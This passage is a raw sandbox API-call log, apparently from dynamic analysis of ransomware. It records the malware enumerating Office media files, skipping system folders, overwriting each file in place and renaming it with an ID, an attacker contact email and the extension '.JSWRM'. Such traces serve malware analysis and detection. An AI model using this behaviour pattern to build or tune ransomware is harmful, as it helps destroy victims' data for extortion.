cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0135.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0135.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0135.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0135.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0135.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0135.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0135.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0135.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0135.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0135.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0135.876] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\PUSH.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\push.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\PUSH.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\push.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0135.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0135.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0135.877] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b22ac67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b22ac67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b22ac67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1664, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="SUCTION.WAV", cAlternateFileName="")) returned 1 [0135.877] lstrcmpiW (lpString1="SUCTION.WAV", lpString2=".") returned 1 [0135.877] lstrcmpiW (lpString1="SUCTION.WAV", lpString2="..") returned 1 [0135.877] lstrcmpiW (lpString1="SUCTION.WAV", lpString2="...") returned 1 [0135.877] lstrcmpiW (lpString1="SUCTION.WAV", lpString2="windows") returned -1 [0135.877] lstrcmpiW (lpString1="SUCTION.WAV", lpString2="recovery") returned 1 [0135.877] lstrcmpiW (lpString1="SUCTION.WAV", lpString2="perflogs") returned 1 [0135.877] lstrcmpiW (lpString1="SUCTION.WAV", lpString2="documents and settings") returned 1 [0135.877] lstrcmpiW (lpString1="SUCTION.WAV", lpString2="$RECYCLE.BIN") returned 1 [0135.877] lstrcmpiW (lpString1="SUCTION.WAV", lpString2="system volume information") returned -1 [0135.877] lstrcmpiW (lpString1="SUCTION.WAV", lpString2="msocache") returned 1 [0135.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0135.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SUCTION.WAV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0135.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SUCTION.WAV", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SUCTION.WAV", lpUsedDefaultChar=0x0) returned 11 [0135.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0135.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0135.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SUCTION.WAV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0135.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SUCTION.WAV", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SUCTION.WAV", lpUsedDefaultChar=0x0) returned 11 [0135.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0135.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0135.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0135.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0135.877] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\SUCTION.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\suction.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.879] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5732) returned 1 [0135.879] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1660) returned 0x27b348 [0135.879] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1660, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1660, lpOverlapped=0x0) returned 1 [0135.881] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.881] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1660, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1660, lpOverlapped=0x0) returned 1 [0135.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0135.881] CloseHandle (hObject=0x238) returned 1 [0135.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0135.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0135.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0135.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0135.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0135.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0135.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0135.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0135.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0135.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0135.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0135.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0135.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0135.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0135.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0135.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0135.881] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\SUCTION.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\suction.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\SUCTION.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\suction.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0135.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0135.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0135.882] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b2049f6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b2049f6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b22ac67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x121c, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="TYPE.WAV", cAlternateFileName="")) returned 1 [0135.882] lstrcmpiW (lpString1="TYPE.WAV", lpString2=".") returned 1 [0135.882] lstrcmpiW (lpString1="TYPE.WAV", lpString2="..") returned 1 [0135.882] lstrcmpiW (lpString1="TYPE.WAV", lpString2="...") returned 1 [0135.883] lstrcmpiW (lpString1="TYPE.WAV", lpString2="windows") returned -1 [0135.883] lstrcmpiW (lpString1="TYPE.WAV", lpString2="recovery") returned 1 [0135.883] lstrcmpiW (lpString1="TYPE.WAV", lpString2="perflogs") returned 1 [0135.883] lstrcmpiW (lpString1="TYPE.WAV", lpString2="documents and settings") returned 1 [0135.883] lstrcmpiW (lpString1="TYPE.WAV", lpString2="$RECYCLE.BIN") returned 1 [0135.883] lstrcmpiW (lpString1="TYPE.WAV", lpString2="system volume information") returned 1 [0135.883] lstrcmpiW (lpString1="TYPE.WAV", lpString2="msocache") returned 1 [0135.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0135.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TYPE.WAV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0135.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TYPE.WAV", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TYPE.WAV", lpUsedDefaultChar=0x0) returned 8 [0135.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0135.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0135.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TYPE.WAV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0135.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TYPE.WAV", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TYPE.WAV", lpUsedDefaultChar=0x0) returned 8 [0135.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0135.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0135.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0135.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0135.883] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\TYPE.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\type.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.884] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4636) returned 1 [0135.884] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1210) returned 0x27b348 [0135.884] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1210, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1210, lpOverlapped=0x0) returned 1 [0135.896] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.896] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1210, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1210, lpOverlapped=0x0) returned 1 [0135.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0135.896] CloseHandle (hObject=0x238) returned 1 [0135.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0135.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0135.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0135.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0135.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0135.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0135.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0135.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0135.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0135.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0135.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0135.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0135.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0135.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0135.899] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\TYPE.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\type.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\TYPE.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\type.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0135.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0135.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0135.900] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b2049f6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b2049f6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b2049f6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x35c6, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="VOLTAGE.WAV", cAlternateFileName="")) returned 1 [0135.900] lstrcmpiW (lpString1="VOLTAGE.WAV", lpString2=".") returned 1 [0135.900] lstrcmpiW (lpString1="VOLTAGE.WAV", lpString2="..") returned 1 [0135.900] lstrcmpiW (lpString1="VOLTAGE.WAV", lpString2="...") returned 1 [0135.900] lstrcmpiW (lpString1="VOLTAGE.WAV", lpString2="windows") returned -1 [0135.900] lstrcmpiW (lpString1="VOLTAGE.WAV", lpString2="recovery") returned 1 [0135.900] lstrcmpiW (lpString1="VOLTAGE.WAV", lpString2="perflogs") returned 1 [0135.900] lstrcmpiW (lpString1="VOLTAGE.WAV", lpString2="documents and settings") returned 1 [0135.901] lstrcmpiW (lpString1="VOLTAGE.WAV", lpString2="$RECYCLE.BIN") returned 1 [0135.901] lstrcmpiW (lpString1="VOLTAGE.WAV", lpString2="system volume information") returned 1 [0135.901] lstrcmpiW (lpString1="VOLTAGE.WAV", lpString2="msocache") returned 1 [0135.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0135.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VOLTAGE.WAV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0135.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VOLTAGE.WAV", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VOLTAGE.WAV", lpUsedDefaultChar=0x0) returned 11 [0135.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0135.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0135.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VOLTAGE.WAV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0135.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VOLTAGE.WAV", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VOLTAGE.WAV", lpUsedDefaultChar=0x0) returned 11 [0135.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0135.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0135.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0135.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0135.901] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\VOLTAGE.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\voltage.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.902] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13766) returned 1 [0135.902] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x35c0) returned 0x27b348 [0135.902] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x35c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x35c0, lpOverlapped=0x0) returned 1 [0135.905] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.905] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x35c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x35c0, lpOverlapped=0x0) returned 1 [0135.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0135.906] CloseHandle (hObject=0x238) returned 1 [0135.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0135.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0135.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0135.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0135.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0135.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0135.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0135.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a228 [0135.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a228, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0135.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a228 | out: hHeap=0x1e0000) returned 1 [0135.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0135.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0135.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0135.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0135.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0135.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0135.906] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\VOLTAGE.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\voltage.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\VOLTAGE.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\voltage.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0135.907] HeapFree (in: hHeap=0x1e0000, 